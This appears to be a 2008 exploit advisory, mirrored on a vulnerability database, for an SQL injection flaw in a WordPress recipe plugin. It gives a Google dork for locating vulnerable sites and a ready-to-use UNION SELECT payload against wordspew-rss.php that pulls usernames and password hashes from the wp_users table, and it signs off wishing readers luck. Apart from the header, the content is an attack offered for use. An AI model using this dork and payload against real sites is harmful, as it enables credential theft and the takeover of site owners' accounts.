Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19177
HistoryFeb 18, 2008 - 12:00 a.m.

Wordpress Plugin (wp-content/recipe) SQL Injection

2008-02-1800:00:00
vulners.com
12

#########################################################################

Wordpress Plugin (wp-content/recipe) SQL Injection

#########################################################################

AUTHOR : S@BUN

HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : allinurl: "wp-content/recipe"

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877//UNION//SELECT//0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5//FROM/**/wp_users

#########################################################################

S@BUN GOOD LUCKY S@BUN

#########################################################################